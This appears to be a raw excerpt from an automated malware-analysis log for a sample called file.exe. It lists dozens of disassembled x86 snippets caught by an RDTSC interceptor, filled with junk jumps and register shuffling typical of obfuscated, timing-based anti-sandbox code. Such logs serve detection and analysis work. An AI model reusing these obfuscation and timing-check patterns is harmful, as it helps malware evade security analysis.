Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D705B0 second address: 4D70619 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8A2C4FB2A9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+10h], eax 0x0000000c jmp 00007F8A2C4FB29Eh 0x00000011 mov eax, dword ptr [ebx+50h] 0x00000014 pushad 0x00000015 mov bx, ax 0x00000018 pushfd 0x00000019 jmp 00007F8A2C4FB29Ah 0x0000001e or cl, 00000028h 0x00000021 jmp 00007F8A2C4FB29Bh 0x00000026 popfd 0x00000027 popad 0x00000028 mov dword ptr [esi+14h], eax 0x0000002b pushad 0x0000002c mov bh, ah 0x0000002e call 00007F8A2C4FB2A1h 0x00000033 push eax 0x00000034 push edx 0x00000035 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D70619 second address: 4D706BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 mov eax, dword ptr [ebx+54h] 0x00000009 pushad 0x0000000a pushad 0x0000000b call 00007F8A2C7FDC29h 0x00000010 pop eax 0x00000011 movsx edi, ax 0x00000014 popad 0x00000015 pushad 0x00000016 mov edx, eax 0x00000018 push ecx 0x00000019 pop edi 0x0000001a popad 0x0000001b popad 0x0000001c mov dword ptr [esi+18h], eax 0x0000001f pushad 0x00000020 pushfd 0x00000021 jmp 00007F8A2C7FDC1Ch 0x00000026 jmp 00007F8A2C7FDC25h 0x0000002b popfd 0x0000002c call 00007F8A2C7FDC20h 0x00000031 mov ax, 93C1h 0x00000035 pop ecx 0x00000036 popad 0x00000037 mov eax, dword ptr [ebx+58h] 0x0000003a pushad 0x0000003b movsx ebx, ax 0x0000003e pushfd 0x0000003f jmp 00007F8A2C7FDC24h 0x00000044 adc ax, 0F08h 0x00000049 jmp 00007F8A2C7FDC1Bh 0x0000004e popfd 0x0000004f popad 0x00000050 mov dword ptr [esi+1Ch], eax 0x00000053 pushad 0x00000054 push eax 0x00000055 push edx 0x00000056 mov edx, 7C2BD1E4h 0x0000005b rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D706BF second address: 4D70745 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F8A2C4FB29Dh 0x00000008 jmp 00007F8A2C4FB29Bh 0x0000000d popfd 0x0000000e pop edx 0x0000000f pop eax 0x00000010 popad 0x00000011 mov eax, dword ptr [ebx+5Ch] 0x00000014 jmp 00007F8A2C4FB2A6h 0x00000019 mov dword ptr [esi+20h], eax 0x0000001c pushad 0x0000001d movzx esi, di 0x00000020 call 00007F8A2C4FB2A3h 0x00000025 jmp 00007F8A2C4FB2A8h 0x0000002a pop ecx 0x0000002b popad 0x0000002c mov eax, dword ptr [ebx+60h] 0x0000002f push eax 0x00000030 push edx 0x00000031 push eax 0x00000032 push edx 0x00000033 jmp 00007F8A2C4FB2A3h 0x00000038 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D70745 second address: 4D70749 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D70749 second address: 4D7074F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D7074F second address: 4D70755 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D70755 second address: 4D70759 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D70759 second address: 4D70797 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esi+24h], eax 0x0000000b pushad 0x0000000c mov dx, cx 0x0000000f pushad 0x00000010 push eax 0x00000011 pop edx 0x00000012 pushfd 0x00000013 jmp 00007F8A2C7FDC1Eh 0x00000018 xor esi, 00700E18h 0x0000001e jmp 00007F8A2C7FDC1Bh 0x00000023 popfd 0x00000024 popad 0x00000025 popad 0x00000026 mov eax, dword ptr [ebx+64h] 0x00000029 push eax 0x0000002a push edx 0x0000002b push eax 0x0000002c push edx 0x0000002d push eax 0x0000002e push edx 0x0000002f rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D70797 second address: 4D7079B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D7079B second address: 4D707A1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D707A1 second address: 4D707EC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, ACBFh 0x00000007 call 00007F8A2C4FB2A4h 0x0000000c pop esi 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov dword ptr [esi+28h], eax 0x00000013 jmp 00007F8A2C4FB2A1h 0x00000018 mov eax, dword ptr [ebx+68h] 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e push ebx 0x0000001f pop eax 0x00000020 jmp 00007F8A2C4FB29Fh 0x00000025 popad 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D707EC second address: 4D70818 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8A2C7FDC29h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+2Ch], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f movsx ebx, ax 0x00000012 mov eax, 12BE3D7Bh 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D70818 second address: 4D708B6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dl, 77h 0x00000005 call 00007F8A2C4FB2A8h 0x0000000a pop ecx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov ax, word ptr [ebx+6Ch] 0x00000012 jmp 00007F8A2C4FB2A1h 0x00000017 mov word ptr [esi+30h], ax 0x0000001b pushad 0x0000001c mov edx, eax 0x0000001e movzx eax, dx 0x00000021 popad 0x00000022 mov ax, word ptr [ebx+00000088h] 0x00000029 pushad 0x0000002a pushfd 0x0000002b jmp 00007F8A2C4FB2A1h 0x00000030 add esi, 6EF0A146h 0x00000036 jmp 00007F8A2C4FB2A1h 0x0000003b popfd 0x0000003c pushfd 0x0000003d jmp 00007F8A2C4FB2A0h 0x00000042 or ch, FFFFFFE8h 0x00000045 jmp 00007F8A2C4FB29Bh 0x0000004a popfd 0x0000004b popad 0x0000004c mov word ptr [esi+32h], ax 0x00000050 push eax 0x00000051 push edx 0x00000052 push eax 0x00000053 push edx 0x00000054 pushad 0x00000055 popad 0x00000056 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D708B6 second address: 4D708BC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D708BC second address: 4D708D9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8A2C4FB2A9h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D708D9 second address: 4D708DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D708DD second address: 4D7091A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [ebx+0000008Ch] 0x0000000e jmp 00007F8A2C4FB29Dh 0x00000013 mov dword ptr [esi+34h], eax 0x00000016 jmp 00007F8A2C4FB29Eh 0x0000001b mov eax, dword ptr [ebx+18h] 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007F8A2C4FB29Ah 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D7091A second address: 4D70929 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8A2C7FDC1Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D70929 second address: 4D7094F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8A2C4FB2A9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+38h], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D7094F second address: 4D70953 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D70953 second address: 4D70957 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D70957 second address: 4D7095D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D7095D second address: 4D709FE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, eax 0x00000005 mov esi, 0238BFF3h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov eax, dword ptr [ebx+1Ch] 0x00000010 pushad 0x00000011 jmp 00007F8A2C4FB2A4h 0x00000016 movzx ecx, bx 0x00000019 popad 0x0000001a mov dword ptr [esi+3Ch], eax 0x0000001d jmp 00007F8A2C4FB29Dh 0x00000022 mov eax, dword ptr [ebx+20h] 0x00000025 pushad 0x00000026 pushad 0x00000027 mov bl, cl 0x00000029 pushfd 0x0000002a jmp 00007F8A2C4FB29Fh 0x0000002f sbb cx, 5D6Eh 0x00000034 jmp 00007F8A2C4FB2A9h 0x00000039 popfd 0x0000003a popad 0x0000003b mov ebx, eax 0x0000003d popad 0x0000003e mov dword ptr [esi+40h], eax 0x00000041 pushad 0x00000042 mov esi, 3B602DEFh 0x00000047 call 00007F8A2C4FB2A4h 0x0000004c mov bx, si 0x0000004f pop ecx 0x00000050 popad 0x00000051 lea eax, dword ptr [ebx+00000080h] 0x00000057 push eax 0x00000058 push edx 0x00000059 push eax 0x0000005a push edx 0x0000005b pushad 0x0000005c popad 0x0000005d rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D709FE second address: 4D70A02 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D70A02 second address: 4D70A08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D70A08 second address: 4D70A33 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F8A2C7FDC27h 0x00000008 pop esi 0x00000009 mov edx, 747999BCh 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push 00000001h 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D70A33 second address: 4D70A4F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8A2C4FB2A8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D70A4F second address: 4D70A55 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D70A55 second address: 4D70A80 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8A2C4FB29Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c jmp 00007F8A2C4FB29Eh 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 mov edx, ecx 0x00000017 mov ebx, ecx 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D70A80 second address: 4D70A85 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D70A85 second address: 4D70A8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D70A8B second address: 4D70AAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F8A2C7FDC28h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D70AAD second address: 4D70AED instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8A2C4FB29Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 lea eax, dword ptr [ebp-10h] 0x0000000c jmp 00007F8A2C4FB2A6h 0x00000011 nop 0x00000012 jmp 00007F8A2C4FB2A0h 0x00000017 push eax 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D70AED second address: 4D70AF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D70AF1 second address: 4D70AF7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D70AF7 second address: 4D70B0D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8A2C7FDC22h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D70B6A second address: 4D70C1A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F8A2C4FB2A0h 0x00000009 or ax, 5B08h 0x0000000e jmp 00007F8A2C4FB29Bh 0x00000013 popfd 0x00000014 jmp 00007F8A2C4FB2A8h 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c js 00007F8A9D0B9DAFh 0x00000022 jmp 00007F8A2C4FB2A0h 0x00000027 mov eax, dword ptr [ebp-0Ch] 0x0000002a pushad 0x0000002b mov cx, CB2Dh 0x0000002f pushad 0x00000030 pushfd 0x00000031 jmp 00007F8A2C4FB29Fh 0x00000036 sub eax, 7D6C995Eh 0x0000003c jmp 00007F8A2C4FB2A9h 0x00000041 popfd 0x00000042 popad 0x00000043 popad 0x00000044 mov dword ptr [esi+04h], eax 0x00000047 push eax 0x00000048 push edx 0x00000049 push eax 0x0000004a push edx 0x0000004b jmp 00007F8A2C4FB2A8h 0x00000050 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D70C1A second address: 4D70C1E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D70C1E second address: 4D70C24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D70C24 second address: 4D70C2A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D70C2A second address: 4D70C2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D70C2E second address: 4D70C32 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D70C32 second address: 4D70C7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 lea eax, dword ptr [ebx+78h] 0x0000000b jmp 00007F8A2C4FB2A4h 0x00000010 push 00000001h 0x00000012 pushad 0x00000013 call 00007F8A2C4FB29Eh 0x00000018 movzx eax, bx 0x0000001b pop edi 0x0000001c movzx ecx, bx 0x0000001f popad 0x00000020 push esp 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 jmp 00007F8A2C4FB29Eh 0x0000002a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D70C7D second address: 4D70C81 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D70C81 second address: 4D70C87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D70C87 second address: 4D70C8D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D70C8D second address: 4D70CF7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b jmp 00007F8A2C4FB2A4h 0x00000010 lea eax, dword ptr [ebp-08h] 0x00000013 pushad 0x00000014 jmp 00007F8A2C4FB29Eh 0x00000019 mov bx, cx 0x0000001c popad 0x0000001d nop 0x0000001e jmp 00007F8A2C4FB29Ch 0x00000023 push eax 0x00000024 push eax 0x00000025 push edx 0x00000026 pushad 0x00000027 pushfd 0x00000028 jmp 00007F8A2C4FB29Ch 0x0000002d jmp 00007F8A2C4FB2A5h 0x00000032 popfd 0x00000033 popad 0x00000034 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D70CF7 second address: 4D70D13 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8A2C7FDC28h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D70D13 second address: 4D70D3C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8A2C4FB29Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F8A2C4FB2A5h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D70D6F second address: 4D70D92 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8A2C7FDC20h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test edi, edi 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e mov dx, 4730h 0x00000012 mov edx, 67FEA65Ch 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D70D92 second address: 4D70D98 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D70D98 second address: 4D70DCF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 js 00007F8A9D3BC52Fh 0x0000000e jmp 00007F8A2C7FDC28h 0x00000013 mov eax, dword ptr [ebp-04h] 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F8A2C7FDC1Ah 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D70DCF second address: 4D70DDE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8A2C4FB29Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D70DDE second address: 4D70E04 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8A2C7FDC29h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+08h], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D70E04 second address: 4D70E08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D70E08 second address: 4D70E0E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D70E0E second address: 4D70E14 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D70E14 second address: 4D70E53 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 lea eax, dword ptr [ebx+70h] 0x0000000b pushad 0x0000000c mov eax, 4C461075h 0x00000011 pushfd 0x00000012 jmp 00007F8A2C7FDC22h 0x00000017 sbb ecx, 719EF5C8h 0x0000001d jmp 00007F8A2C7FDC1Bh 0x00000022 popfd 0x00000023 popad 0x00000024 push 00000001h 0x00000026 push eax 0x00000027 push edx 0x00000028 push eax 0x00000029 push edx 0x0000002a push eax 0x0000002b push edx 0x0000002c rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D70E53 second address: 4D70E57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D70E57 second address: 4D70E5D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D70E5D second address: 4D70E8D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8A2C4FB29Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a jmp 00007F8A2C4FB2A0h 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F8A2C4FB29Eh 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D70E8D second address: 4D70E93 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D70E93 second address: 4D70E97 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D70EF6 second address: 4D70FB5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8A2C7FDC1Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov edi, eax 0x0000000b jmp 00007F8A2C7FDC26h 0x00000010 test edi, edi 0x00000012 pushad 0x00000013 mov di, cx 0x00000016 push ecx 0x00000017 push ebx 0x00000018 pop ecx 0x00000019 pop ebx 0x0000001a popad 0x0000001b js 00007F8A9D3BC39Dh 0x00000021 jmp 00007F8A2C7FDC20h 0x00000026 mov eax, dword ptr [ebp-14h] 0x00000029 jmp 00007F8A2C7FDC20h 0x0000002e mov ecx, esi 0x00000030 pushad 0x00000031 push ecx 0x00000032 pushfd 0x00000033 jmp 00007F8A2C7FDC1Dh 0x00000038 xor eax, 68A44086h 0x0000003e jmp 00007F8A2C7FDC21h 0x00000043 popfd 0x00000044 pop eax 0x00000045 push eax 0x00000046 push edx 0x00000047 pushfd 0x00000048 jmp 00007F8A2C7FDC27h 0x0000004d xor si, DFBEh 0x00000052 jmp 00007F8A2C7FDC29h 0x00000057 popfd 0x00000058 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D70FB5 second address: 4D71078 instructions: 0x00000000 rdtsc 0x00000002 call 00007F8A2C4FB2A0h 0x00000007 pop ecx 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov dword ptr [esi+0Ch], eax 0x0000000e pushad 0x0000000f mov edx, 2F236F82h 0x00000014 pushfd 0x00000015 jmp 00007F8A2C4FB2A3h 0x0000001a or ecx, 2FB37A7Eh 0x00000020 jmp 00007F8A2C4FB2A9h 0x00000025 popfd 0x00000026 popad 0x00000027 mov edx, 759B06ECh 0x0000002c jmp 00007F8A2C4FB29Eh 0x00000031 sub eax, eax 0x00000033 pushad 0x00000034 mov eax, ebx 0x00000036 mov si, bx 0x00000039 popad 0x0000003a lock cmpxchg dword ptr [edx], ecx 0x0000003e jmp 00007F8A2C4FB2A5h 0x00000043 pop edi 0x00000044 push eax 0x00000045 push edx 0x00000046 pushad 0x00000047 pushfd 0x00000048 jmp 00007F8A2C4FB2A3h 0x0000004d and eax, 7589CA9Eh 0x00000053 jmp 00007F8A2C4FB2A9h 0x00000058 popfd 0x00000059 push eax 0x0000005a push edx 0x0000005b rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D71078 second address: 4D7107D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D7107D second address: 4D710B1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8A2C4FB2A7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test eax, eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F8A2C4FB2A5h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D710B1 second address: 4D710C8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, bx 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jne 00007F8A9D3BC236h 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D710C8 second address: 4D710CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D710CC second address: 4D710DC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8A2C7FDC1Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
